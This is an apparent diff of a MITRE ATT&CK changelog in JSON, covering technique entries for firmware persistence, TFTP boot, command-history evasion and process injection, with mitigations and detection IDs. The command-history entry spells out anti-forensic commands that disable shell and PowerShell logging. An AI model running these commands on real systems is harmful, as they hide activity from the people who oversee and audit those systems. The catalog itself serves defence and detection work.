+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1026: Privileged Account Management",
+                            "M1046: Boot Integrity"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0150: Detection Strategy for File Creation or Modification of Boot Files"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--791481f8-e96a-41be-b089-a088763083d4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-12-19 20:21:21.669000+00:00",
+                    "modified": "2026-05-12 15:12:00.643000+00:00",
+                    "name": "Component Firmware",
+                    "description": "Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.\n\nMalicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "persistence"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1542/002",
+                            "external_id": "T1542.002"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows",
+                        "Linux",
+                        "macOS"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.643000+00:00\", \"old_value\": \"2026-04-17 18:38:49.538000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1051: Update Software"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0323: Detection Strategy for T1542.002 Pre-OS Boot: Component Firmware"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--a6557c75-798f-42e4-be70-ab4502e0a3bc",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-10-20 00:05:48.790000+00:00",
+                    "modified": "2026-05-12 15:12:00.706000+00:00",
+                    "name": "ROMMONkit",
+                    "description": "Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)\n\n\nROMMON is a Cisco network device firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software when the platform is powered on or reset. Similar to [TFTP Boot](https://attack.mitre.org/techniques/T1542/005), an adversary may upgrade the ROMMON image locally or remotely (for example, through TFTP) with adversary code and restart the device in order to overwrite the existing ROMMON image. This provides adversaries with the means to update the ROMMON to gain persistence on a system in a way that may be difficult to detect.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "persistence"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1542/004",
+                            "external_id": "T1542.004"
+                        },
+                        {
+                            "source_name": "Cisco Synful Knock Evolution",
+                            "description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020.",
+                            "url": "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices"
+                        },
+                        {
+                            "source_name": "Cisco Blog Legacy Device Attacks",
+                            "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.",
+                            "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Network Devices"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.706000+00:00\", \"old_value\": \"2026-04-17 18:38:49.551000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1031: Network Intrusion Prevention",
+                            "M1046: Boot Integrity",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0175: Detection Strategy for T1542.004 Pre-OS Boot: ROMMONkit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--16ab6452-c3c1-497c-a47d-206018ca1ada",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-12-19 19:43:34.507000+00:00",
+                    "modified": "2026-05-12 15:12:00.621000+00:00",
+                    "name": "System Firmware",
+                    "description": "Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer.(Citation: Wikipedia BIOS)(Citation: Wikipedia UEFI)(Citation: About UEFI)\n\nSystem firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "persistence"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1542/001",
+                            "external_id": "T1542.001"
+                        },
+                        {
+                            "source_name": "About UEFI",
+                            "description": "UEFI Forum. (n.d.). About UEFI Forum. Retrieved January 5, 2016.",
+                            "url": "http://www.uefi.org/about"
+                        },
+                        {
+                            "source_name": "Wikipedia UEFI",
+                            "description": "Wikipedia. (2017, July 10). Unified Extensible Firmware Interface. Retrieved July 11, 2017.",
+                            "url": "https://en.wikipedia.org/wiki/Unified_Extensible_Firmware_Interface"
+                        },
+                        {
+                            "source_name": "Wikipedia BIOS",
+                            "description": "Wikipedia. (n.d.). BIOS. Retrieved January 5, 2016.",
+                            "url": "https://en.wikipedia.org/wiki/BIOS"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Jean-Ian Boutin, ESET",
+                        "McAfee",
+                        "Ryan Becwar"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.621000+00:00\", \"old_value\": \"2026-04-17 18:38:49.546000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1026: Privileged Account Management",
+                            "M1046: Boot Integrity",
+                            "M1051: Update Software"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0099: Detection Strategy for T1542.001 Pre-OS Boot: System Firmware"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--28abec6c-4443-4b03-8206-07f2e264a6b4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-10-20 00:06:56.180000+00:00",
+                    "modified": "2026-05-12 15:12:00.623000+00:00",
+                    "name": "TFTP Boot",
+                    "description": "Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.\n\nAdversaries may manipulate the configuration on the network device specifying use of a malicious TFTP server, which may be used in conjunction with [Modify System Image](https://attack.mitre.org/techniques/T1601) to load a modified image on device startup or reset. The unauthorized image allows adversaries to modify device configuration, add malicious capabilities to the device, and introduce backdoors to maintain control of the network device while minimizing detection through use of a standard functionality. This technique is similar to [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) and may result in the network device running a modified image. (Citation: Cisco Blog Legacy Device Attacks)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "persistence"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1542/005",
+                            "external_id": "T1542.005"
+                        },
+                        {
+                            "source_name": "Cisco Blog Legacy Device Attacks",
+                            "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.",
+                            "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Network Devices"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.623000+00:00\", \"old_value\": \"2026-04-17 18:38:49.555000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1026: Privileged Account Management",
+                            "M1028: Operating System Configuration",
+                            "M1031: Network Intrusion Prevention",
+                            "M1035: Limit Access to Resource Over Network",
+                            "M1046: Boot Integrity",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0582: Detection Strategy for T1542.005 Pre-OS Boot: TFTP Boot"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--b831f51c-d22f-4724-bbab-60d056bd1150",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-14 22:53:28.653000+00:00",
+                    "modified": "2026-05-12 15:12:00.709000+00:00",
+                    "name": "Prevent Command History Logging",
+                    "description": "Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they have done.\n\nOn Linux and macOS, command history is tracked in a file pointed to by the environment variable `HISTFILE`. When a user logs off a system, this information is flushed to a file in the user's home directory called `~/.bash_history`. The `HISTCONTROL` environment variable keeps track of what should be saved by the history command and eventually into the `~/.bash_history` file when a user logs out. `HISTCONTROL` does not exist by default on macOS, but can be set by the user and will be respected. The `HISTFILE` environment variable is also used in some ESXi systems.(Citation: Google Cloud Threat Intelligence ESXi VIBs 2022)\n\nAdversaries may clear the history environment variable (`unset HISTFILE`) or set the command history size to zero (`export HISTFILESIZE=0`) to prevent logging of commands. Additionally, `HISTCONTROL` can be configured to ignore commands that start with a space by simply setting it to \"ignorespace\". `HISTCONTROL` can also be set to ignore duplicate commands by setting it to \"ignoredups\". In some Linux systems, this is set by default to \"ignoreboth\" which covers both of the previous examples. This means that \" ls\" will not be saved, but \"ls\" would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands.\n\nOn Windows systems, the `PSReadLine` module tracks commands used in all PowerShell sessions and writes them to a file (`$env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt` by default). Adversaries may change where these logs are saved using `Set-PSReadLineOption -HistorySavePath {File Path}`. This will cause `ConsoleHost_history.txt` to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command `Set-PSReadlineOption -HistorySaveStyle SaveNothing`.(Citation: Microsoft about_History prevent command history)(Citation: Sophos PowerShell Command History Forensics)\n\nAdversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to disable historical command logging (e.g. `no logging`).",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1690",
+                            "external_id": "T1690"
+                        },
+                        {
+                            "source_name": "Google Cloud Threat Intelligence ESXi VIBs 2022",
+                            "description": "Alexander Marvi, Jeremy Koppen, Tufail Ahmed, and Jonathan Lepore. (2022, September 29). Bad VIB(E)s Part One: Investigating Novel Malware Persistence Within ESXi Hypervisors. Retrieved March 26, 2025.",
+                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/esxi-hypervisors-malware-persistence"
+                        },
+                        {
+                            "source_name": "Microsoft about_History prevent command history",
+                            "description": "Microsoft. (n.d.). Retrieved April 15, 2026.",
+                            "url": "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_history?view=powershell-7.6&viewFallbackFrom=powershell-7"
+                        },
+                        {
+                            "source_name": "Sophos PowerShell Command History Forensics",
+                            "description": "Vikas, S. (2020, August 26). PowerShell Command History Forensics. Retrieved November 17, 2024.",
+                            "url": "https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Austin Clark, @c2defense",
+                        "Emile Kenning, Sophos",
+                        "Vikas Singh, Sophos"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.709000+00:00\", \"old_value\": \"2026-04-22 15:45:06.768000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1028: Operating System Configuration",
+                            "M1039: Environment Variable Permissions"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0563: Detection Strategy for Defense Impairment via Prevent Command History Logging across OS platforms."
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:30:48.728000+00:00",
+                    "modified": "2026-05-12 15:12:00.705000+00:00",
+                    "name": "Process Discovery",
+                    "description": "Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Administrator or otherwise elevated access may provide better process details. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nIn Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or <code>Get-Process</code> via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as <code>CreateToolhelp32Snapshot</code>. In Mac and Linux, this is accomplished with the <code>ps</code> command. Adversaries may also opt to enumerate processes via `/proc`. ESXi also supports use of the `ps` command, as well as `esxcli system process list`.(Citation: Sygnia ESXi Ransomware 2025)(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021)\n\nOn network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show processes` can be used to display current running processes.(Citation: US-CERT-TA18-106A)(Citation: show_processes_cisco_cmd)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1057",
+                            "external_id": "T1057"
+                        },
+                        {
+                            "source_name": "show_processes_cisco_cmd",
+                            "description": "Cisco. (2022, August 16). show processes - . Retrieved July 13, 2022.",
+                            "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/show_monitor_permit_list_through_show_process_memory.html#wp3599497760"
+                        },
+                        {
+                            "source_name": "Crowdstrike Hypervisor Jackpotting Pt 2 2021",
+                            "description": "Michael Dawson. (2021, August 30). Hypervisor Jackpotting, Part 2: eCrime Actors Increase Targeting of ESXi Servers with Ransomware. Retrieved March 26, 2025.",
+                            "url": "https://www.crowdstrike.com/en-us/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/"
+                        },
+                        {
+                            "source_name": "US-CERT-TA18-106A",
+                            "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.",
+                            "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A"
+                        },
+                        {
+                            "source_name": "Sygnia ESXi Ransomware 2025",
+                            "description": "Zhongyuan Hau (Aaron), Ren Jie Yow, and Yoav Mazor. (2025, January 21). ESXi Ransomware Attacks: Stealthy Persistence through. Retrieved March 27, 2025.",
+                            "url": "https://www.sygnia.co/blog/esxi-ransomware-ssh-tunneling-defense-strategies/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Austin Clark, @c2defense"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.6",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.705000+00:00\", \"old_value\": \"2025-10-24 17:49:05.839000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.6",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0034: Detection of Adversarial Process Discovery Behavior"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:30:47.843000+00:00",
+                    "modified": "2026-05-12 15:12:00.629000+00:00",
+                    "name": "Process Injection",
+                    "description": "Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process. \n\nThere are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific. \n\nMore sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1055",
+                            "external_id": "T1055"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Anastasios Pingios",
+                        "Christiaan Beek, @ChristiaanBeek",
+                        "Ryan Becwar"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.629000+00:00\", \"old_value\": \"2026-04-15 22:26:41.663000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1026: Privileged Account Management",
+                            "M1040: Behavior Prevention on Endpoint"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0508: Behavioral Detection of Process Injection Across Platforms"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--7c0f17c9-1af6-4628-9cbd-9e45482dd605",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-01-14 01:29:43.786000+00:00",
+                    "modified": "2026-05-12 15:12:00.644000+00:00",
+                    "name": "Asynchronous Procedure Call",
+                    "description": "Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges. APC injection is a method of executing arbitrary code in the address space of a separate live process. \n\nAPC injection is commonly performed by attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process's thread. Queued APC functions are executed when the thread enters an alterable state.(Citation: Microsoft APC) A handle to an existing victim process is first created with native Windows API calls such as <code>OpenThread</code>. At this point <code>QueueUserAPC</code> can be used to invoke a function (such as <code>LoadLibrayA</code> pointing to a malicious DLL). \n\nA variation of APC injection, dubbed \"Early Bird injection\", involves creating a suspended process in which malicious code can be written and executed before the process' entry point (and potentially subsequent anti-malware hooks) via an APC. (Citation: CyberBit Early Bird Apr 2018) AtomBombing (Citation: ENSIL AtomBombing Oct 2016) is another variation that utilizes APCs to invoke malicious code previously written to the global atom table.(Citation: Microsoft Atom Table)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via APC injection may also evade detection from security products since the execution is masked under a legitimate process. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1055/004",
+                            "external_id": "T1055.004"
+                        },
+                        {
+                            "source_name": "CyberBit Early Bird Apr 2018",
+                            "description": "Gavriel, H. & Erbesfeld, B. (2018, April 11). New \u2018Early Bird\u2019 Code Injection Technique Discovered. Retrieved May 24, 2018.",
+                            "url": "https://www.cyberbit.com/blog/endpoint-security/new-early-bird-code-injection-technique-discovered/"
+                        },
+                        {
+                            "source_name": "ENSIL AtomBombing Oct 2016",
+                            "description": "Liberman, T. (2016, October 27). ATOMBOMBING: BRAND NEW CODE INJECTION FOR WINDOWS. Retrieved December 8, 2017.",
+                            "url": "https://blog.ensilo.com/atombombing-brand-new-code-injection-for-windows"
+                        },
+                        {
+                            "source_name": "Microsoft Atom Table",
+                            "description": "Microsoft. (n.d.). About Atom Tables. Retrieved December 8, 2017.",
+                            "url": "https://msdn.microsoft.com/library/windows/desktop/ms649053.aspx"
+                        },
+                        {
+                            "source_name": "Microsoft APC",
+                            "description": "Microsoft. (n.d.). Asynchronous Procedure Calls. Retrieved December 8, 2017.",
+                            "url": "https://msdn.microsoft.com/library/windows/desktop/ms681951.aspx"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.644000+00:00\", \"old_value\": \"2026-04-15 22:26:41.151000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1040: Behavior Prevention on Endpoint"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0100: Behavioral Detection of Asynchronous Procedure Call (APC) Injection via Remote Thread Queuing"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-01-14 01:26:08.145000+00:00",
+                    "modified": "2026-05-12 15:12:00.724000+00:00",
+                    "name": "Dynamic-link Library Injection",
